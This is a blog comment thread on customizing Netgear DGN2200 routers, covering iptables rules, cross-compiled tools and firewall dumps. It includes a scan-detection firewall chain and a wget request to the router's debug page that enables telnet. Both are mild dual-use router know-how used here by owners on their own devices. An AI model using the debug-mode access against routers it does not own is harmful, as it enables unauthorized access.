target prot opt source destination
TCPMSS tcp -- anywhere anywhere tcp flags:SYN,RST/S
YN TCPMSS clamp to PMTU
HTTP_DETECT all -- anywhere anywhere
OUTBOUND_FILTER all -- anywhere anywhere
FWD_SPI all -- anywhere anywhere
FWD_VPN all -- anywhere anywhere
FWD_IGMP all -- anywhere anywhere
NAT_LIMIT all -- anywhere anywhere
PT_FILTER all -- anywhere anywhere
ACCEPT_RULES all -- anywhere anywhere
DOS_DETECT all -- anywhere anywhere
MINIUPNPD all -- anywhere anywhere
INBOUND_FILTER all -- anywhere anywhere
DMZ_FILTER all -- anywhere anywhere
FIREWALL_DISABLE all -- anywhere anywhere

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
IM_FILTER all -- anywhere UNKNOWN-216-155-193-X.yahoo.com/24

Chain ACCEPT_RULES (2 references)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTAB
LISHED
ACCEPT all -- anywhere anywhere mark match 0x2511
ACCEPT all -- anywhere anywhere

Chain BLOCK_HTTP (0 references)
target prot opt source destination
REJECT all -- anywhere anywhere reject-with http-bl
ock

Chain DMZ_FILTER (1 references)
target prot opt source destination

Chain DOS (1 references)
target prot opt source destination
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN,PSH,URG DLOG UNKNOWN level 19 prefix `Xmas Tree Scan'
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN,PSH,URG
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN DLOG UNKNOWN level 19 prefix `FIN Scan'
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:FIN,SYN,RST,PSH,ACK,URG/NONE DLOG UNKNOWN level 19 prefix `NULLScan'
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/NONE
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:ACK/ACK DLOG UNKNOWN level 19 prefix `ACK Scan'
DROP tcp -- anywhere anywhere tcp flags:ACK/ACK
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:FIN,SYN,RST,PSH,ACK,URG/RST DLOG UNKNOWN level 19 prefix `RST Scan'
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/RST
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:FIN,SYN,RST,PSH,ACK,URG/SYN,RST DLOG UNKNOWN level 19 prefix `SYN/RST Scan'
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/SYN,RST
DLOG tcp -- anywhere anywhere limit: avg 3/min burst 1 tcp flags:FIN,SYN/FIN,SYN DLOG UNKNOWN level 19 prefix `IMAP Scan'
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN/FIN,SYN
DLOG tcp -- anywhere anywhere tcp flags:URG/URG DLOG UNKNOWN level 19 prefix `WinNuke Attack'
DROP tcp -- anywhere anywhere tcp flags:URG/URG

Chain DOS_DETECT (2 references)
target prot opt source destination
DOS all -- anywhere anywhere

Chain FIREWALL_DISABLE (1 references)
target prot opt source destination

Chain FWD_IGMP (1 references)
target prot opt source destination
ACCEPT all -- anywhere base-address.mcast.net/3

Chain FWD_SPI (1 references)
target prot opt source destination
DROP icmp -- anywhere anywhere icmp port-unreachab
le
SKIPLOG udp -- anywhere anywhere udp spt:19 dpt:7
SKIPLOG udp -- anywhere anywhere udp spt:7 dpt:19
SKIPLOG tcp -- anywhere anywhere tcp spt:19 dpt:7
SKIPLOG tcp -- anywhere anywhere tcp spt:7 dpt:19

Chain FWD_VPN (1 references)
target prot opt source destination

Chain HTTP (1 references)
target prot opt source destination
RETURN all -- anywhere anywhere
KEY_BLOCK_HTTP all -- anywhere anywhere
IM_FILTER all -- anywhere anywhere STRING match "gateway.messenger.hotmail.com" ALGO name bm TO 65535 ICASE
IM_FILTER all -- anywhere anywhere STRING match "YMSG" ALGO name bm TO 65535 ICASE

Chain HTTP_DETECT (1 references)
target prot opt source destination
SKIPLOG tcp -- anywhere anywhere tcp dpt:80
HTTP tcp -- anywhere anywhere tcp dpt:80

Chain IGMP_INPUT (1 references)
target prot opt source destination
ACCEPT 2 -- anywhere base-address.mcast.net/3

Chain IM_FILTER (3 references)
target prot opt source destination

Chain INBOUND_FILTER (1 references)
target prot opt source destination

Chain INPUT_VPN (1 references)
target prot opt source destination

Chain KEY_BLOCK_HTTP (1 references)
target prot opt source destination

Chain LOCAL (1 references)
target prot opt source destination
RESPONSE_PING icmp -- anywhere anywhere
LOCAL_RIP all -- anywhere anywhere
LOCAL_TELNET all -- anywhere anywhere
ACCEPT udp -- anywhere anywhere udp spt:67 dpt:68

Chain LOCAL_RIP (1 references)
target prot opt source destination

Chain LOCAL_TELNET (1 references)
target prot opt source destination
ACCEPT tcp -- anywhere www.routerlogin.com tcp dpt:23

Chain MINIUPNPD (1 references)
target prot opt source destination
ACCEPT tcp -- anywhere 192.168.0.101 tcp dpt:6891

Chain NAT_LIMIT (1 references)
target prot opt source destination
NATLIMIT all -- anywhere anywhere lan:192.168.0.1/24

Chain OUTBOUND_FILTER (1 references)
target prot opt source destination

Chain PT_FILTER (1 references)
target prot opt source destination

Chain REMOTE_FILTER (1 references)
target prot opt source destination

Chain RESPONSE_PING (1 references)
target prot opt source destination

Chain SCAN (0 references)
target prot opt source destination

Chain USB_FILTER (1 references)
target prot opt source destination
``

• Federico Pellegrin on 2014-02-09 19:42:56 +0100

Hello!
Add a “-t nat” to the command line since that chain is in the “nat” table. So “iptables -L -t nat” to see all and so on.

Ciao!

• anthonyno on 2014-02-10 22:19:29 +0100

No udp traffic enabled after
<br /> iptables -A INPUT -p udp -j ACCEPT<br /> iptables -t nat -F PRE_CNAPT<br />
🙁

• Federico Pellegrin on 2014-02-11 09:58:23 +0100

Hello,
I took my time to do a test 🙂 So I put on the DGN2200 netcat in listen mode on UDP port 4444:
# ./nc -u -l -p 4444<br />
Then I tried from an outside host to send some stuff to it with (x.y.z.z is my router IP):
nc -u x.y.z.z 4444<br />
And of course it wasn’t working. Then I did as suggested on the router command line:
<br /> iptables -A INPUT -p udp -s 0/0 -d 0/0 --dport 4444 -j ACCEPT<br /> iptables -t nat -I PRE_CNAPT 1 -p udp -s 0/0 -d 0/0 --dport 4444 -j ACCEPT<br />
So both add in the INPUT chain and also insert in the head (that is important) of the PRE_CNAPT and then the test worked, I could see packets coming in over the UDP port 4444.

Of course in your case you can change port 4444 to the one(s) you need and it should work. The setup was tested on the standard iptables configuration on the router.

Hope it helps,

Ciao,
Federico

• hudin on 2014-02-11 18:47:57 +0100

Hi,

Looks like a great post, i like how you could tweak your routers. I found this post on my search for tweaking my netgear DVG1000 router. Since my internet provider won’t prvide me with the voip credentials, i have to live with this router. Nevertheless i have access to telnet and want to modify the router for my own needs. Since the router has the same broacom cpu model i hoped, i could use your binaries on my router, too (not sure about the uclibc version). But already the the gzip binary outputs an error unresolved symbol ‘__cxa_atexit’. Is it possible to make your binaries working on my router (i am interested in openVPN and tcpdump)? Is there any way i could go around cross compiling it for myself (never worked with cross-compiling, try to avoid it since i am not a pro)?

Cheers and hope you can help me somehow

• anthonyno on 2014-02-11 20:48:58 +0100

Hi Federico,

I’m pretty sure last iptables commands you gave me correctly allow upd multicast traffic, I tried them without results, so I think igmp traffic is not allowed as I thought.
I tried also to add the standard command for igmp
<br /> iptables -I INPUT -p igmp -j ACCEPT<br />
Unfortunately no success…

• anthonyno on 2014-02-11 20:50:30 +0100

Real command I gave is
iptables -I INPUT -p 2 -j ACCEPT
because igmp is not recognized…

• Federico Pellegrin on 2014-02-12 06:49:52 +0100

Hello!
I gave a look at the DVG1000 and it’s quite simillar to the DGN2200 but probably given the error there is a slightly different toolchain/library used in it. I checked out on Netgear Open Source Code page and indeed find different versions for your router.
First of all which one is your specific router? I can eventually try to get one of them and prepare a bunch of interesting packets also for all other DVG1000 routers in case when I have a bit of time if you can then test them 🙂
Otherwise we could give a try to use statically linked binaries that may probably work aswell: i just compiled a static version of gzip here (gzip.static) try to see if that seem to work on your system. Of course using all static version would prove quite more space consuming if we have many tools to crosscompile.

Let me know!

Ciao,
F.

• hudin on 2014-02-13 13:16:36 +0100

Hi
I appreciate your effort in helping me. My router is the DVG1000-1WGSWS, the firmware version on my router is V1.1.00.13. I found this here which one might use as toolchain but i couldn’t set it up working yet.
Else if you could prepare some packets i would gladly test them. i will also try to check the static gzip packet whem i’m back at home.
Cheers

• hudin on 2014-02-13 20:15:48 +0100

Thanks for the static version of gzip. This version works no on the router. I downloaded the openVPN and the tcpdump to check. Interestingly, the openVPN packet seems to work (just checked if it starts, haven’t tried to connect to the router yet), but the tcpdump has the same problem as with the gzip before unresolved symbol ‘__cxa_atexit’

• Federico Pellegrin on 2014-02-14 06:39:23 +0100

Great the static version is working. I’ll prepare also a static version of tcpdump later on then and post it here.
As for OpenVPN: in the package I also had to include the tun.ko kernel module for it to work properly. If the tun device is not already compiled in the kernel then it may be needed to add it. In case give it a try (check also that you have to create the /dev/tun device as in the instructions in the article)

Ciao!

• Federico Pellegrin on 2014-02-14 06:43:49 +0100

Hello!
I’m sorry it still doesn’t work. It’s strange now I checked a bit more out the issue and I see that also on the Web interface there is a IGMP proxy setting (actually Disable IGMP Proxying in the Advanced -> WAN Setup) so I suppose the router was already meant to to IGMP proxying. Did you try to play maybe with this option aswell? (for example disable it when you’re trying the other software I compiled for you) Also if you check the process on the router there is a sc_igmp that may interfeer with your tests.

In case if possible let me know your test case for this IGMP tests (so how do you try to see if it works in practice) so I can try to reproduce eventually on my side.

ciao!
F.

• Federico Pellegrin on 2014-02-16 13:19:45 +0100

Hello!
Here comes tcpdump statically linked: tcpdump-dgn2200-bin-static.tar.gz

Ciao!

• hudin on 2014-02-18 10:41:42 +0100

Hi,

thanks a lot. The static version is working for the DVG1000. (Note that the link in your reply is pointing to the non static version, you might change this later). Hope this will also help other people working with this router.

Cheers!

• Federico Pellegrin on 2014-02-18 10:45:43 +0100

Thanks for the correction, it was because of copy&paste 🙂 Fixed now!

Glad it works, keep up the customization of the router 😉

Ciao!

• Gianluca on 2014-03-26 04:07:24 +0100

Hi Federico,
do you know how can I disconnect a connected device?
wl have a hudge list of commands and I can’t figure it out 😛

• Neil on 2014-05-16 10:09:22 +0100

I’ve put together a small page describing how I implemented traffic shaping (TCP/ACK prioritisation etc.), network optimisations and basic SNMP monitoring on a Netgear DGND4000 router with additional custom iptables kernel modules (xt_CLASSIFY.ko, xt_hashlimit.ko and xt_length.ko).

http://nmacleod.com/public/netgear_bin/notes/index.html

Hope someone finds it useful.

• Federico Pellegrin on 2014-05-18 07:07:55 +0100

Great work, thanks for the link!

• stefanot on 2014-06-08 13:56:36 +0100

hi.
you are a dream!
I’ve tried to find all over somebody that copied and shared your method, without any result.
before to trought my 2200vs away…
could you explain to a newbe better how to do it?
how I have to create the files and where I have to put my account/password that I have created at dnsdynamic
thank you very much

• Alessandro on 2014-06-17 12:31:41 +0100

Hi Federico!

Is it possible to implement the 2200M functionality (3g dongle support) on V3?
It should be quite easy since that both firmware are opensource….

• Steve on 2014-08-06 12:50:28 +0100

Hi Federico,
First – thanks for all the work you’ve done on this modem. REALLY useful. Now the second – further back in the article, you mentioned that you may be compiling a mail utility that would work in SSL. Any progress with this? The reason I ask is that I’ve been using the mail forwarding of logs to my PC, but my ISP has just changed their SMTP server – and now require SSL/TLS encryption for the login process – so now I can’t get any emails out from the modem.

• Federico Pellegrin on 2014-08-14 07:17:19 +0100

Hello Steve!
Sorry for the delay but I’m in a busy period (relocating and so on).

Here come msmtps 1.4.30 (http://msmtp.sourceforge.net/) I compiled some time ago but forgot to pack. Download the pack here: msmtp-1.4.30-dgn2200.tar.gz. Inside there are also some libraries that are needed, so either put them in /usr/lib or force the library path from command line, for example:

LD_LIBRARY_PATH=. ./msmtp –help

Will work if you have everything in the same directory. I tested it with gmail so it should work hopefully for you too:)

Ciao!
F.

• Federico Pellegrin on 2014-08-14 07:21:50 +0100

Hello Alessandro!
Yes it should be possibile. You’d need to add eventually the drivers for the specific dongle (here depends all on the model you use) and then tweak just a bit the scripts to bring up the connection (just ppp) and firewall. Definitely possibile I’d say, but depends on the dongle (and having it available to test under your hands) and a bit of scripting to tweak.

Ciao,

• Daniele on 2014-08-27 22:33:43 +0100

Hi federico thank you for all your work. At home i have the netgear dgn 2200 v3 and i’m trying to make it “wake on lan” my home pc . I can wake it up from another pc in the same lan. But i’m trying to find a way to do it directly from the router. You compiled nc which is cool bu unfortunately there is a known and old bug that make udp broadcast impossible. Can you please point me to the correct toolchain to crosscompile socat which work perfectly? In fact i just need to broadcast a udp packet.

• Light on 2014-11-15 03:35:36 +0100

Hello Fedrico,

Thank you for the wonderful work, I had almost given up on this modem till I found your site!!

Hey, any chance you can provide an updated openVPN package? I was wondering with all the SSL vulnerabilities recently, it may be a good idea to install the latest one…

Thanks Again!

• Steve on 2015-02-13 09:43:26 +0100

Hi Federico, is it still possible to ask questions on this blog?

If so, for the DGN2200 is it possible to change the IPTABLE rules to force the Google Safe Search VIP. If possible could you define the steps for me please?

Thank you.

• Federico Pellegrin on 2015-02-14 08:39:01 +0100

Hello,
Sure it’s till possible to ask! Just due to spam the comments have to be first approved and it may take some time 🙂

This being said: yes it should be possible as on a “normal” Linux box and so on. I don’t have a DGN2200 currently under my hands at the moment (relocation is a bad beast!) but I’d suggest you to try something like refeered in this thread:

http://www.dd-wrt.com/phpBB2/viewtopic.php?t=175005&sid=f23d2a827d3bb90ef17c9e24d1e3e9df

or even check the TOR article for DGN2200 (here http://www.evolware.org/?p=224) and you could just add the specific google addresses to the iptables rule.

Should it not work in case let me know and I’ll try to come back!

Ciao,
F.

• Steve on 2015-02-18 17:40:31 +0100

Thanks Frederico. I will check out those links.

• Tzimon on 2015-03-09 23:22:12 +0100

Hello,

I checked my DGN2200M (last publicly available firmware) and it appears that the filesystem is mounted through squashfs (so it seems that it can’t be re-mounted as rw). Is there any hope to let it just execute some script at start-up?

Thank you!

• Federico Pellegrin on 2015-03-12 20:18:57 +0100

Hi!
squashfs is indeed read-only so cannot be remounted. you could download it, modify and reflash, but is quite quite risky. are you sure there isn’t any even small partition that is writeable (for config data and so on)?

Ciao!
f.

• Valentino on 2015-04-28 23:31:03 +0100

Hi

Is there a way to configure L2TP vpn as i need this to configure a static address from my ISP

Thank you

• Federico Pellegrin on 2015-05-01 07:51:10 +0100

Hi!
In principle it may be possible, but you have to compile the L2TP client at least yourself. It may need also some kernel module compilation likely (depends on the L2TP implementation you’d be using). So it should be possible, but not probably so straight forward.

Ciao,
F.

• Dean on 2015-05-06 10:33:15 +0100

Hi federico,

Love the blog, I’ve refered to it many times and its been very handy.
Is it possible to run an irc bouncer on the dgn2200v3? Something like znc or bip?
Or any other way to have a persistent irc connection? Could weechat run on this modem?

Thanks for any help/advice you can give.
Dean

• Federico Pellegrin on 2015-05-10 08:50:35 +0100

Hi Dean!
I tried to compile znc 1.6 but that needs c++ which is not in the toolchain, so it would take some time to compile.
I compiled for you znc 1.4 which doesn’t require c++. I cannot try it right now since I dont use the DGN2200v3 at the moment since I’ve moved and using now cable here. Please give it a try and let me know! If it doesn’t work I’ll get out the DGN from the relocation boxes and make sure it goes 🙂

Here is the src tarball with compiled files: http://www.evolware.org/dnload/dgn2200n/znc-1.4-dgn2200-src-bin.tar.gz
(In case it complains about SSL libraries please get them from one of the packs in the article and put them in the same dir or so)

Ciao,
F.

• Andy on 2015-06-07 03:24:36 +0100

I want to add my own local hostnames to the /etc/hosts file on my Netgear DGN2200v3 V1.1.00.24_1.00.24, so the names are available to any device on my local network. The netgear resolv.conf only has nameserver entries (for the external DNS servers I’ve stated in the GUI), so unless Netgear have had a play with the default resolv behaviour of checking the /etc/hosts file first, before pestering a DNS server, this should suit my requirements. Unfortunately I’ve hit an issue, they have added something that dynamically regenerates the /etc/hosts file on reboot. Does anyone know what’s doing this / where to stick your own mappings on the router, to get them to reappear in the /etc/hosts file after a reboot (the /usr/etc/hosts file doesn’t work)?

Or alternatively how the custom init.d process works? As I’m sure I could stick a custom script in place to append a list of hosts at a suitable point, if I were to know when in the process the /etc/hosts file is overwritten.

$ wget –output-document=/dev/null http://$NETGEARUSER:$NETGEARPASS@192.168.0.1/setup.cgi?todo=debug
$ telnet 192.168.0.1
…
# cat /etc/hosts
192.168.0.1 http://www.routerlogin.com
192.168.0.1 routerlogin.com
192.168.0.1 http://www.routerlogin.net
192.168.0.1 routerlogin.net
192.168.0.1 readyshare.routerlogin.net
192.168.0.1 readyshare.routerlogin.com
# mount -n -o remount,rw /
# echo “192.168.0.1 another.domain” » /etc/hosts
# mount -n -o remount,ro /

• Amit on 2015-06-08 12:36:05 +0100

Is there a way to compile sftp-server

• Amit on 2015-06-11 11:02:47 +0100

Is it possible to port bitsync

• Dean on 2015-06-19 08:50:49 +0100

Hi Federico,

Sorry I’ve taken so long to get back to you. Thank you for compiling ZNC, I got it to work for me. Ive looked through your blog and I can’t find the SSL libraries you mentioned can you point me in the right direction?
Thanks again your the best!
Dean.

• Sami on 2015-06-25 09:25:29 +0100

Excellent! Tried it on my DGN2200v3. Works like a charm. Whether there’s an extra delay from boot to established internet connection, I’m not sure.

• whiterabbit on 2015-08-24 03:57:38 +0100

I have EXACT SAME question…been trollin for days…pleez help if you can.

“At home i have the netgear dgn 2200 v3 and i’m trying to make it “wake on lan” my home pc . I can wake it up from another pc in the same lan. But i’m trying to find a way to do it directly from the router. You compiled nc which is cool bu unfortunately there is a known and old bug that make udp broadcast impossible. Can you please point me to the correct toolchain to crosscompile socat which work perfectly? In fact i just need to broadcast a udp packet.” wrote by Danielle in 2014! never was responded too….

• Federico Pellegrin on 2015-08-29 16:25:18 +0100

Hi,
You can find socat 2.0.0-b8 compiled for DGN2200 here:
http://www.evolware.org/dnload/dgn2200n/socat-2.0.0-b8-dgn2200-bin.tar.gz

In the tar there is also libreadline that is needed. I tried it briefly on my device and it works:

# LD_LIBRARY_PATH=. ./socat - TCP-LISTEN:25,crlf

Hopefully it works correctly also for the specific needs you have

Ciao,
F.

• Daniel on 2016-05-09 07:51:15 +0100

Ciao Federico,

ho bisogno di un tuo aiuto! Possiedo un Netgear d6200, ho già provveduto a scaricare i sorgenti dal loro sito per compilarmi nano tag e company dato che quelli già compilati non sembrano andare al 100%.
Quando provo a compilare o a fare il make non mi va nulla, non capisco perchè.. Ho provato con osx e con ubuntu, ma nada.
Saresti così gentile da compilarmi nano, tar e gzip? Grazie

• David on 2016-08-27 23:55:30 +0100

Hi,

Good job, thanks!!

I was wondering how you have compiled tcpdump, because I have compiled like this … and it doesn’t work in my Huawei HG556a:

Download and decompress libpcap
export CFLAGS=”-muclibc -static”
CC=mips-linux-gnu-gcc ac_cv_linux_vers=2 ./configure –host=mips-linux-gnu –with-pcap=linux
make

Download and decompress tcpdump
CC=mips-linux-gnu-gcc ac_cv_linux_vers=2 ./configure –host=mips-linux-gnu –includedir=/to/the/path/libpcap –disable-ipv6
make

However, I have downloaded your tcpdump binary and it works, how did you do it?

Thanks, best regards.

• Vincent on 2016-12-12 17:42:10 +0100

Hello,

That is such a good post, thank you!

I managed to telnet into the router, but I can’t seem to connect through FTP. I used WinSCP and tried FTP, SFTP and SCP, but nothing worked. All using the user/pass of the router.

Also, I created a couple .sh scripts and added a line at the end of /usr/etc/rcS to run these 2 scripts, but they don’t seem to get executed when I reboot the router.

Any idea how I can manage this?

Thanks!

• Federico Pellegrin on 2016-12-20 15:06:49 +0100

Hi,
Are you sure the scripts are correct (with the shebang at the beginning) and executable? Have you tried to run them by hand?

FTP should work by default. It’s a long time I don’t use it (I can get it out of the box when I have a little of time) but try both “root” and “admin” as username and the password the same as set via network.

Cheers,

• Federico Pellegrin on 2016-12-20 15:10:04 +0100

Hi,
You have to force some arguments in the cache file of configure. Sincerely as it passed so much time I don’t remember which, but here is the complete config log so you can try it out, so tcpdump:

./configure --host=mips-linux --cache mycachefile

And mycachefile is:

``

This file is a shell script that caches the results of configure

tests run on this system so they can be shared between configure

scripts and configure runs, see configure’s option –config-cache.

It is not useful on other systems. If it contains results you don’t

want to keep, you may remove or edit it.

#

config.status only pays attention to the cache file if you give it

the –recheck option to rerun configure.

#

`ac_cv_env_foo’ variables (set or unset) will be overridden when

loading this file, other unset `ac_cv_foo’ will be assigned the

following values.

ac_cv___attribute__=${ac_cv___attribute__=yes}
ac_cv___attribute___format_function_pointer=${ac_cv___attribute___format_function_pointer=yes}
ac_cv_addrinfo=${ac_cv_addrinfo=yes}
ac_cv_build=${ac_cv_build=x86_64-unknown-linux-gnu}
ac_cv_c_compiler_gnu=${ac_cv_c_compiler_gnu=yes}
ac_cv_env_CC_set=
ac_cv_env_CC_value=
ac_cv_env_CFLAGS_set=
ac_cv_env_CFLAGS_value=
ac_cv_env_CPPFLAGS_set=
ac_cv_env_CPPFLAGS_value=
ac_cv_env_CPP_set=
ac_cv_env_CPP_value=
ac_cv_env_LDFLAGS_set=set
ac_cv_env_LDFLAGS_value=--static
ac_cv_env_LIBS_set=
ac_cv_env_LIBS_value=
ac_cv_env_build_alias_set=
ac_cv_env_build_alias_value=
ac_cv_env_host_alias_set=set
ac_cv_env_host_alias_value=mips-linux
ac_cv_env_target_alias_set=
ac_cv_env_target_alias_value=
ac_cv_func_alarm=${ac_cv_func_alarm=yes}
ac_cv_func_bpf_dump=${ac_cv_func_bpf_dump=yes}
ac_cv_func_ether_ntohost=${ac_cv_func_ether_ntohost=no}
ac_cv_func_fork=${ac_cv_func_fork=yes}
ac_cv_func_pcap_breakloop=${ac_cv_func_pcap_breakloop=yes}
ac_cv_func_pcap_create=${ac_cv_func_pcap_create=yes}
ac_cv_func_pcap_datalink_name_to_val=${ac_cv_func_pcap_datalink_name_to_val=yes}
ac_cv_func_pcap_datalink_val_to_description=${ac_cv_func_pcap_datalink_val_to_description=yes}
ac_cv_func_pcap_dump_flush=${ac_cv_func_pcap_dump_flush=yes}
ac_cv_func_pcap_dump_ftell=${ac_cv_func_pcap_dump_ftell=yes}
ac_cv_func_pcap_findalldevs=${ac_cv_func_pcap_findalldevs=yes}
ac_cv_func_pcap_lib_version=${ac_cv_func_pcap_lib_version=yes}
ac_cv_func_pcap_list_datalinks=${ac_cv_func_pcap_list_datalinks=yes}
ac_cv_func_pcap_loop=${ac_cv_func_pcap_loop=yes}
ac_cv_func_pcap_set_datalink=${ac_cv_func_pcap_set_datalink=yes}
ac_cv_func_pcap_set_tstamp_type=${ac_cv_func_pcap_set_tstamp_type=yes}
ac_cv_func_setlinebuf=${ac_cv_func_setlinebuf=yes}
ac_cv_func_sigaction=${ac_cv_func_sigaction=yes}
ac_cv_func_snprintf=${ac_cv_func_snprintf=yes}
ac_cv_func_strcasecmp=${ac_cv_func_strcasecmp=yes}
ac_cv_func_strdup=${ac_cv_func_strdup=yes}
ac_cv_func_strftime=${ac_cv_func_strftime=yes}
ac_cv_func_strlcat=${ac_cv_func_strlcat=yes}
ac_cv_func_strlcpy=${ac_cv_func_strlcpy=yes}
ac_cv_func_strsep=${ac_cv_func_strsep=yes}
ac_cv_func_vfork=${ac_cv_func_vfork=yes}
ac_cv_func_vfprintf=${ac_cv_func_vfprintf=yes}
ac_cv_func_vsnprintf=${ac_cv_func_vsnprintf=yes}
ac_cv_header_fcntl_h=${ac_cv_header_fcntl_h=yes}
ac_cv_header_inttypes_h=${ac_cv_header_inttypes_h=yes}
ac_cv_header_memory_h=${ac_cv_header_memory_h=yes}
ac_cv_header_net_pfvar_h=${ac_cv_header_net_pfvar_h=no}
ac_cv_header_netdnet_dnetdb_h=${ac_cv_header_netdnet_dnetdb_h=no}
ac_cv_header_netinet_if_ether_h=${ac_cv_header_netinet_if_ether_h=yes}
ac_cv_header_pcap_bluetooth_h=${ac_cv_header_pcap_bluetooth_h=no}
ac_cv_header_pcap_usb_h=${ac_cv_header_pcap_usb_h=no}
ac_cv_header_rpc_rpc_h=${ac_cv_header_rpc_rpc_h=yes}
ac_cv_header_rpc_rpcent_h=${ac_cv_header_rpc_rpcent_h=no}
ac_cv_header_smi_h=${ac_cv_header_smi_h=no}
ac_cv_header_stdc=${ac_cv_header_stdc=yes}
ac_cv_header_stdint_h=${ac_cv_header_stdint_h=yes}
ac_cv_header_stdlib_h=${ac_cv_header_stdlib_h=yes}
ac_cv_header_string_h=${ac_cv_header_string_h=yes}
ac_cv_header_strings_h=${ac_cv_header_strings_h=yes}
ac_cv_header_sys_bitypes_h=${ac_cv_header_sys_bitypes_h=yes}
ac_cv_header_sys_stat_h=${ac_cv_header_sys_stat_h=yes}
ac_cv_header_sys_types_h=${ac_cv_header_sys_types_h=yes}
ac_cv_header_time=${ac_cv_header_time=yes}
ac_cv_header_unistd_h=${ac_cv_header_unistd_h=yes}
ac_cv_host=${ac_cv_host=mips-unknown-linux-gnu}
ac_cv_lbl_gcc_vers=${ac_cv_lbl_gcc_vers=4}
ac_cv_lbl_inline=${ac_cv_lbl_inline=inline}
ac_cv_lbl_sockaddr_has_sa_len=${ac_cv_lbl_sockaddr_has_sa_len=no}
ac_cv_lbl_unaligned_fail=${ac_cv_lbl_unaligned_fail=yes}
ac_cv_lib_dlpi_dlpi_walk=${ac_cv_lib_dlpi_dlpi_walk=no}
ac_cv_lib_rpc_main=${ac_cv_lib_rpc_main=no}
ac_cv_lib_smi_smiInit=${ac_cv_lib_smi_smiInit=no}
ac_cv_linux_vers=${ac_cv_linux_vers=2}
ac_cv_maxserv=${ac_cv_maxserv=yes}
ac_cv_namereqd=${ac_cv_namereqd=yes}
ac_cv_objext=${ac_cv_objext=o}
ac_cv_path_EGREP=${ac_cv_path_EGREP='/bin/grep -E'}
ac_cv_path_GREP=${ac_cv_path_GREP=/bin/grep}
ac_cv_path_ac_pt_PCAP_CONFIG=${ac_cv_path_ac_pt_PCAP_CONFIG=/opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/usr/bin//pcap-config}
ac_cv_path_install=${ac_cv_path_install='/usr/bin/install -c'}
ac_cv_prog_CC=${ac_cv_prog_CC=mips-linux-gcc}
ac_cv_prog_CPP=${ac_cv_prog_CPP='mips-linux-gcc -E'}
ac_cv_prog_RANLIB=${ac_cv_prog_RANLIB=mips-linux-ranlib}
ac_cv_prog_cc_c89=${ac_cv_prog_cc_c89=}
ac_cv_prog_cc_g=${ac_cv_prog_cc_g=yes}
ac_cv_sa_storage=${ac_cv_sa_storage=yes}
ac_cv_search_dnet_htoa=${ac_cv_search_dnet_htoa=no}
ac_cv_search_gethostbyname=${ac_cv_search_gethostbyname='none required'}
ac_cv_search_getrpcbynumber=${ac_cv_search_getrpcbynumber='none required'}
ac_cv_search_putmsg=${ac_cv_search_putmsg=no}
ac_cv_search_socket=${ac_cv_search_socket='none required'}
ac_cv_sockaddr_has_sa_len=${ac_cv_sockaddr_has_sa_len=no}
ac_cv_ssleay_path=${ac_cv_ssleay_path=no}
ac_cv_type_int16_t=${ac_cv_type_int16_t=yes}
ac_cv_type_int32_t=${ac_cv_type_int32_t=yes}
ac_cv_type_int64_t=${ac_cv_type_int64_t=yes}
ac_cv_type_int8_t=${ac_cv_type_int8_t=yes}
ac_cv_type_pcap_if_t=${ac_cv_type_pcap_if_t=yes}
ac_cv_type_signal=${ac_cv_type_signal=void}
ac_cv_type_u_int16_t=${ac_cv_type_u_int16_t=yes}
ac_cv_type_u_int32_t=${ac_cv_type_u_int32_t=yes}
ac_cv_type_u_int64_t=${ac_cv_type_u_int64_t=yes}
ac_cv_type_u_int8_t=${ac_cv_type_u_int8_t=yes}
ac_cv_var_h_errno=${ac_cv_var_h_errno=yes}
ac_lbl_cv_pcap_debug_defined=${ac_lbl_cv_pcap_debug_defined=no}
ac_lbl_cv_yydebug_defined=${ac_lbl_cv_yydebug_defined=no}
td_cv_decl_netdnet_dnetdb_h_dnet_htoa=${td_cv_decl_netdnet_dnetdb_h_dnet_htoa=no}
``

And libpcap:

./configure --host=mips-linux --prefix=/opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/usr/ --with-pcap=linux

HTH

• Vincent Lavoie on 2016-12-27 21:22:52 +0100

Thanks!

I managed to start the FTP server with bftpd, which is already provided on the router 🙂

• Mitja on 2017-01-16 13:46:00 +0100

Hi do you think I can change LED color from green into blue or yellow?

Thanks for Anwsering and Best Regards

• Barry on 2017-01-25 13:42:25 +0100

This is a great resource Frederico, fantastic work!

So are we permitted to still ask you a question on the DGN2200v3?

I am a total noob too so apologies if this is a silly question….

So, is it possible in anyway to have one of the lan ports re-assigned as a wan port? As I say I am a total noob, but I’m assuming it would have something to do with ifconfig and iptables? GUessing all of this would have to be done from cmd line and there would be no GUI supported since there isn’t a wan port on this device by default.

No need to worry about my question if you no longer have the router.

Thanks!

• Federico Pellegrin on 2017-01-27 07:31:45 +0100

Hi,
I still have the router but unplugged from a long time since I have cable from a few years now 🙂

In principle: yes, can be done, but requires some command line (for sure no UI support) work with route and iptables to redirect traffic depending on the interface. For sure it is feasible!

Cheers,
Federico

• Federico Pellegrin on 2017-01-27 07:32:16 +0100

Sorry not really I think.
Cheers,

• Ian on 2017-02-07 21:54:43 +0100

Hi Federico,

I have this router and was wondering if it was possible to configure it to act as a wireless station. E.g. it would power up and attatch to another wireless access point and then bridge that network over to the four ethernet points.

I’m trying to attach a device that is in another room of my house that only has an ethernet port to the existing wireless network.

Thanks,

Ian.

• Nick on 2017-08-04 15:26:38 +0100

